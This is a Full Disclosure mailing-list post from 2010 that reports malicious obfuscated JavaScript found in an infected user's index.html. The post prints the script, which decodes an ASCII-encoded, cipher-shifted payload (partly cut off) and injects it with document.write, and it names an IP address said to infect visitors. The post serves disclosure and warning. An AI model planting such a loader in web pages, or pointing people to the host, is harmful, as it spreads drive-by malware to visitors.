Full Disclosure mailing list archives
Some nice code yust captured
From: Stephan Gerling <SGerling () RosenInspection net>
Date: Mon, 22 Feb 2010 15:12:26 +0100
Dear all, I just get a information by a scared user about something strange on his computer. I investigate and found this script. ----------------------from the index.html------------------------------- #alert { z-index:1300; width:434px; height:332px; position:absolute; display:none; cursor:hand; background:url(/res/1/1/images/alert.gif); } </style> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title></title> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script> <script type="text/javascript"> var y2c2a2ff = ["s","x","Z","f","B","U","X","J","W","N","c","C","O","G","T","I","P","S","D","h","F","k","Q","y","u","w","b","r","o","j","q","l","m","t","z","A","E","i","M","L","p","n","g","Y","e","V","R","v","H","a","d","K"], z2c2a2ff = 9; var dl_d7e9ccb94 = 'd_d7e9cc.jpg'; var cc = 1, ee = 1; (function() { dl_d7e9ccb94 = dl_d7e9ccb94.replace(/\.jpg/, '.php'); var temp="",i,pass2 = "",sou=""; var x2c2a = "60)^$,78)^$,104)^$,69)^$,82)^$,97)^$,103)^$,32)^$,103)^$,10 -----cut off------ seems like ascii codes /-------cut off------ Continue of the script 78)^$,104)^$,69)^$,82)^$,97)^$,103)^$,62)^$,"; temp = x2c2a.split(")^$,"); for (var i in temp) { pass2 += String.fromCharCode(temp[i]); } pass2 = pass2.replace(/\&/g,'&'); pass2 = pass2.replace(/\</g,'<'); pass2 = pass2.replace(/\>/g,'>'); pass2 = pass2.replace(/\"/g,'"'); var pass1 = ""; temp = pass2.split(""); for (var i in temp) { sou += f2c2a2ff7f(temp[i]); } document.write(sou); })(); function f2c2a2ff7f(s_in){ var index = $.inArray(s_in, y2c2a2ff); if(index >= 0){ var new_index = (index - z2c2a2ff) < 0 ? y2c2a2ff.length - (z2c2a2ff - index) : index - z2c2a2ff; return y2c2a2ff[new_index]; } return s_in; } </script> <script type="text/javascript"> (function($) { if ($.browser.mozilla) { $.fn.disableTextSelect = function() { return this.each(function() { $(this).css({ 'MozUserSelect' : 'none' }); }); }; $.fn.enableTextSelect = function() { return this.each(function() { $(this).css({ 'MozUserSelect' : '' }); }); }; } else if ($.browser.msie) { $.fn.disableTextSelect = function() { return this.each(function() { $(this).bind('selectstart.disableTextSelect', function() { return false; }); }); }; $.fn.enableTextSelect = function() { return this.each(function() { $(this).unbind('selectstart.disableTextSelect'); }); }; } else { $.fn.disableTextSelect = function() { return this.each(function() { $(this).bind('mousedown.disableTextSelect', function() { return false; }); }); }; $.fn.enableTextSelect = function() { return this.each(function() { $(this).unbind('mousedown.disableTextSelect'); }); }; } })(jQuery); </script> </head> <body> </body> </html> If you open this webpage http : / / 217.23.5.205 / index.ht...... You will be infected with Virus/Malware: Cryp_Krap-9 Best regards, Stephan Gerling May the force be with you ------------------------- Obi-Wan _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Some nice code yust captured Stephan Gerling (Feb 22)